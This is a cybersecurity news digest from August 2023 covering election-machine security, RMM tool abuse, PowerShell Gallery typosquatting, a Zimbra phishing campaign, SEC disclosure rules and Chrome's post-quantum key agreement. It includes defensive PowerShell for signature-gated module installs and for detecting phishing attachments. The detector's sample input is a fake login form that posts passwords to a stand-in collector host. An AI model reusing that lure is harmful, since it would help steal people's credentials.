Your Daily Decrypt

8/18/2023 - Today’s news and insights for cybersecurity pros and leaders

📰 Top Stories 

Summary

Who's Involved: Organizers of the DEF CON hacker convention, DARPA, Galois, and security researchers.

What's Happening: DEF CON's 'Voting Village' event focused on enhancing election equipment security and the physical safety of researchers. This year saw the introduction of a $10 million DARPA-funded open-source voting machine designed to resist hacking.

Why It Matters:

  • Election Security: The integrity of voting machines is essential for democratic processes.

  • Physical Safety: The event addressed increased threats to researchers and election officials.

  • Innovation: A new open-source voting machine marks a significant advancement in secure elections.

Why it’s important to you

Stay Informed: Understanding the measures taken to ensure election security and the technology behind it.

Know the Risks: Recognizing the challenges and threats faced by those working to safeguard election integrity.

Embrace Innovation: Appreciating the advancements in technology that contribute to secure and transparent voting processes.

Summary

Who's Involved: U.S. Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Joint Cyber Defense Collaborative (JCDC), and various RMM (remote monitoring and management) vendors.

What's Happening: CISA, in collaboration with other agencies and private companies, published a Cyber Defense Plan for Remote Monitoring and Management. The plan addresses the security risks of RMM tools, which attackers increasingly abuse because, as legitimate signed administrative software with broad access to managed endpoints, their activity blends in with normal IT operations and is rarely blocked by security controls.

Why It Matters:

  • Security Risks: Both nation-states and cybercriminals are exploiting RMM software to gain unauthorized access to systems, including federal civilian agencies.

  • Coordinated Effort: The plan emphasizes vulnerability information sharing, industry coordination, end-user education, and advisory amplification.

  • Nation's Infrastructure: The move aims to reduce risks to critical infrastructure and to foster collaboration across the cybersecurity ecosystem.

Why it’s important to you

Stay Informed: If you or your organization relies on RMM tools, be aware of best practices for safeguarding these systems.

Know the Strategy: The plan aligns with broader national cybersecurity strategies and provides a roadmap for enhancing the security and resilience of RMM tools.

🚨 Threat Alerts

Summary

What's Happening: Microsoft's PowerShell Gallery is vulnerable to supply chain attacks, including typosquatting, due to weak protections against malicious package uploads, according to researchers at Aqua Nautilus. Despite Microsoft's claim to have addressed the issues, researchers found that the problems persist.

Why It Matters:

  • Typosquatting Risk: The PowerShell Gallery lacks protection against typosquatting, allowing malicious packages with names similar to popular legitimate ones to be uploaded.

  • Owner Identity Spoofing: Attackers can fake package details such as author and description, making malicious packages appear legitimate.

  • Unlisted Modules Exposure: Aqua's analysis found that attackers could enumerate modules their owners had marked unlisted (and therefore assumed hidden), and in one instance found live secrets inside such a module.

  • Common Usage: With over 1.6 billion package downloads this year alone, many organizations rely on the PowerShell Gallery for code modules and resources.

Why it’s important to you

Use Caution: If you or your organization uses PowerShell modules from the gallery, install only from a trusted internal repository where possible, pin exact versions rather than "latest", and verify Authenticode signatures against publishers you have explicitly approved before a module is imported; gallery metadata such as author and description is self-declared and should not be trusted on its own.

Stay Informed: Keep an eye on updates and improvements in the PowerShell Gallery's security measures, as the current vulnerabilities could be exploited.
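The signature-verification step described above, as an added example (this is not code from Aqua Nautilus, Microsoft, or the PowerShell Gallery): the function stages a module from the gallery into a scratch directory, refuses it unless every script, manifest and binary carries a valid Authenticode signature whose certificate subject is on an explicit allow-list, and only then copies it into the module path. The module name, version and signer subject in the usage comment are assumptions for illustration, as is the choice of the first PSModulePath entry as the install location.

```powershell
# Added example: gallery module install gated on pinned version + Authenticode signature
# from an allow-listed publisher. Not the gallery's own code; names below are assumptions.
# Requires PowerShellGet and Windows (Get-AuthenticodeSignature is Windows-only).

function Install-VerifiedModule {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string]   $Name,
        [Parameter(Mandatory)] [string]   $RequiredVersion,   # always pin; never "latest"
        [Parameter(Mandatory)] [string[]] $TrustedSigners,    # exact certificate Subject strings you trust
        [string] $Repository = 'PSGallery'
    )

    # Stage into a scratch directory so nothing is imported or installed before it is checked.
    $stage = Join-Path ([IO.Path]::GetTempPath()) ('psverify-' + [guid]::NewGuid().ToString())
    New-Item -ItemType Directory -Path $stage | Out-Null
    try {
        Save-Module -Name $Name -RequiredVersion $RequiredVersion -Repository $Repository `
                    -Path $stage -ErrorAction Stop

        # Save-Module lays the module out as <stage>\<Name>\<version>\...
        $versionDir = Get-ChildItem -Path (Join-Path $stage $Name) -Directory | Select-Object -First 1
        if (-not $versionDir) { throw "Nothing was downloaded for $Name $RequiredVersion" }

        # Every file that can carry code must be signed; a single unsigned .ps1 is enough to refuse.
        $files = Get-ChildItem -Path $versionDir.FullName -Recurse -File |
                 Where-Object { $_.Extension -in '.ps1', '.psm1', '.psd1', '.dll' }
        if (-not $files) { throw "No code files found in $Name $RequiredVersion" }

        foreach ($f in $files) {
            $sig = Get-AuthenticodeSignature -FilePath $f.FullName
            if ($sig.Status -ne 'Valid') {
                throw "Refusing ${Name}: $($f.Name) has signature status '$($sig.Status)'"
            }
            # Gallery Author/CompanyName/description are self-declared and can be spoofed;
            # the subject of the certificate that actually signed the file is what you trust.
            $subject = $sig.SignerCertificate.Subject
            if ($TrustedSigners -notcontains $subject) {
                throw "Refusing ${Name}: $($f.Name) is signed by unexpected publisher '$subject'"
            }
        }

        # All files verified: copy the staged version into the first PSModulePath entry
        # (assumed here to be the per-user module directory).
        $userModules = ($env:PSModulePath -split [IO.Path]::PathSeparator)[0]
        $dest = Join-Path (Join-Path $userModules $Name) $versionDir.Name
        if (Test-Path $dest) { Remove-Item -Path $dest -Recurse -Force }
        New-Item -ItemType Directory -Path (Split-Path $dest) -Force | Out-Null
        Copy-Item -Path $versionDir.FullName -Destination $dest -Recurse
        Write-Host "Installed $Name $($versionDir.Name) from $Repository after signature verification"
    }
    finally {
        Remove-Item -Path $stage -Recurse -Force -ErrorAction SilentlyContinue
    }
}

# Usage (hypothetical module and publisher; needs network access to the gallery):
# Install-VerifiedModule -Name 'Contoso.Tooling' -RequiredVersion '2.4.1' `
#     -TrustedSigners @('CN=Contoso Corporation, O=Contoso Corporation, L=Redmond, S=Washington, C=US')
```

Pair this with a repository policy: leave PSGallery at its default InstallationPolicy of Untrusted, host vetted modules on an internal feed registered with Register-PSRepository, and keep the allow-list of signer subjects in source control so a typosquatted package that merely copies a popular module's name, author field and description still fails the check because it cannot produce that publisher's signature.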

Summary

What's Happening: A phishing campaign targeting Zimbra Collaboration email servers has been underway since at least April 2023. The unknown attackers are using phishing emails that pretend to be from an organization's admin, warning of an imminent email server update and requesting recipients to open an HTML attachment.

How It Works:

  • Deceptive Email: The phishing email informs users about an impending server upgrade and asks them to open an attached HTML file to avoid account deactivation.

  • Fake Login Page: Opening the HTML attachment reveals a fake Zimbra login page, complete with the targeted company's branding.

  • Password Theft: Any passwords entered on the phishing page are sent directly to the attacker's server.

Why It Matters:

  • Widespread Campaign: The campaign has been successful despite its lack of sophistication, with no specific focus on certain organizations or sectors.

  • Previous Attacks: Zimbra Collaboration email servers have previously been exploited by hacking groups for cyber espionage or as initial breach points.

Why it’s important to you

Stay Vigilant: If your organization uses Zimbra Collaboration, be aware of this phishing threat and exercise caution with emails regarding server updates.

Secure Your Systems: Review and implement security measures to detect and prevent phishing attempts.
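One concrete detection for the attachment described in this campaign, as an added example (not code from the researchers who reported it or from Zimbra): the function scans a saved .html attachment, and when it contains a password field it flags any form that posts to a host you do not operate, any password form with no absolute action at all, and any other external host referenced in the file (which catches lures that submit via JavaScript instead of a normal form submit). The sample HTML and the allow-listed host are constructed for illustration.

```powershell
# Added example: flag credential-harvesting HTML attachments that send passwords to an
# external host. Sample lure and allowed hosts below are constructed, not from the campaign.

function Find-CredentialPhishInHtml {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string]   $Html,
        [Parameter(Mandatory)] [string[]] $AllowedHosts    # hosts your real login pages and assets live on
    )
    $findings = New-Object System.Collections.Generic.List[object]
    $reported = New-Object System.Collections.Generic.HashSet[string]

    # Nothing to steal without a password field; plain HTML notices are not our concern here.
    if ($Html -notmatch '(?i)<input\b[^>]*type\s*=\s*["'']?password') { return @() }

    # 1. Forms that contain a password field: check where they post.
    $formRegex = [regex]'(?is)<form\b[^>]*>.*?</form>'
    foreach ($m in $formRegex.Matches($Html)) {
        $form = $m.Value
        if ($form -notmatch '(?i)<input\b[^>]*type\s*=\s*["'']?password') { continue }

        $action = ''
        if ($form -match '(?i)<form\b[^>]*\baction\s*=\s*["'']?([^"''\s>]+)') { $action = $Matches[1] }

        if ($action -match '(?i)^https?://') {
            $h = ([uri]$action).Host.ToLowerInvariant()
            if ($AllowedHosts -notcontains $h -and $reported.Add($h)) {
                $findings.Add([pscustomobject]@{ Reason = 'Password form posts to external host'; Target = $h })
            }
        } else {
            # A relative or missing action in a file opened from disk is itself odd: the
            # credentials are then usually collected by script rather than a normal submit.
            $findings.Add([pscustomobject]@{ Reason = 'Password form without absolute action'; Target = $action })
        }
    }

    # 2. Any other absolute URL pointing at a host you do not own (fetch/XMLHttpRequest exfil).
    foreach ($u in ([regex]'(?i)https?://([A-Za-z0-9.-]+)').Matches($Html)) {
        $h = $u.Groups[1].Value.ToLowerInvariant()
        if ($AllowedHosts -notcontains $h -and $reported.Add($h)) {
            $findings.Add([pscustomobject]@{ Reason = 'External host referenced alongside password field'; Target = $h })
        }
    }
    return $findings.ToArray()
}

# Constructed sample resembling the reported lure: the victim's own branding, a login form,
# and an action pointing at an attacker-controlled collector (hypothetical hostnames).
$sample = @'
<html><body>
<img src="https://mail.example.org/skins/logo.png" alt="Example Corp Mail">
<p>Your mailbox will be deactivated unless you confirm your credentials before the server upgrade.</p>
<form method="post" action="https://collector.example.net/zimbra/submit.php">
  <input name="username" type="text" placeholder="Email">
  <input name="password" type="password" placeholder="Password">
  <input type="submit" value="Sign in">
</form>
</body></html>
'@

# Expected: one finding, 'Password form posts to external host' for collector.example.net;
# the logo hosted on mail.example.org is allow-listed and not reported.
Find-CredentialPhishInHtml -Html $sample -AllowedHosts @('mail.example.org') | Format-Table -AutoSize
```

Run this from a mail-gateway or SOAR hook over every inbound .html/.htm attachment and quarantine on any finding; it is a string-level check, so a lure that base64-encodes or otherwise obfuscates its markup will need decoding first, and the second pass will also surface legitimate third-party CDNs, which you handle by adding them to the allow-list rather than by weakening the rule.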

⚖️ Regulatory Updates

Summary

Who's Behind the New Rules: U.S. Securities and Exchange Commission (SEC).

What They Did: Released final cyber disclosure rules for public companies.

How They Did It: Focused on three main categories: Risk Management and Strategy, Governance, and Incident Reporting.

What's Been Affected: Public companies' obligations to disclose cyber risks, breaches, governance, and incident reporting procedures.

What Actions Were Taken:

  • Risk Management Strategy: Detailed disclosure on the integration of cyber risk management with overall risk management and third-party involvement.

  • Governance: Disclosure of board and management's roles in cyber risk assessment.

  • Incident Reporting: Disclosure of a material cybersecurity incident on Form 8-K within four business days of the company determining it is material, with a delay permitted only where the U.S. Attorney General determines that disclosure would pose a substantial risk to national security or public safety.

Why it’s important to you

Stay Informed: Public companies must be aware of these rules and the compliance dates: the Form 8-K incident disclosure requirement applies from December 18, 2023 (smaller reporting companies get an additional 180 days), and the annual risk management, strategy and governance disclosures apply to Form 10-K filings for fiscal years ending on or after December 15, 2023.

Be Proactive: The rules highlight the SEC's focus on transparency regarding cyber risks and underscore the importance of robust cyber risk management practices.

Consider Implications: Non-compliance with these rules can lead to enforcement actions and liability concerns. Public companies should assess and, if necessary, bolster their cyber risk management strategies and ensure proper governance and incident reporting procedures.

👀 Curated Finds

Summary

Who's Behind the Update: Google.

What They Did: Added support for quantum-resistant encryption in Chrome to make web browsing safe from potential quantum computer threats.

How They Did It: Introduced a new hybrid key agreement mechanism called X25519Kyber768, which combines X25519 (an elliptic-curve Diffie-Hellman key agreement) with Kyber-768 (a quantum-resistant Key Encapsulation Mechanism, or KEM).

What's Been Affected: TLS 1.3 key agreement in Chrome. The session keys are derived from both an X25519 shared secret and a Kyber-768 shared secret, so an attacker must break both to recover the traffic; classical security is unchanged even if Kyber turns out to be weaker than expected.

What Actions Were Taken:

  • Implementation: X25519Kyber768 is made available in Chrome 116 and behind a flag in Chrome 115.

  • Quantum Security: The new mechanism is designed to protect against future quantum computer attacks, including "harvest now, decrypt later" threats, where traffic recorded today is decrypted once a sufficiently powerful quantum computer exists.

Why it’s important to you

Stay Informed: Understanding the future risks of quantum computers and Google's steps to mitigate those threats is essential for cybersecurity professionals and Chrome users.

Be Proactive: Google's forward-looking approach may inspire other technology companies to adopt quantum-resistant encryption, strengthening overall cybersecurity.

Consider Implications: With a cryptographically relevant quantum computer still years away, this update demonstrates Google's commitment to future-proofing Chrome and addressing potential security concerns proactively. One practical caveat: the Kyber-768 key share makes the ClientHello considerably larger than before, which can break TLS middleboxes and servers that do not handle a hello spanning more than one record or packet; Google has said administrators can temporarily disable the mechanism with the PostQuantumKeyAgreementEnabled enterprise policy while such devices are fixed.

Please let me know if you have any comments or feedback by replying to this email or messaging me on X!

Thank you 🙏
Ali Abidi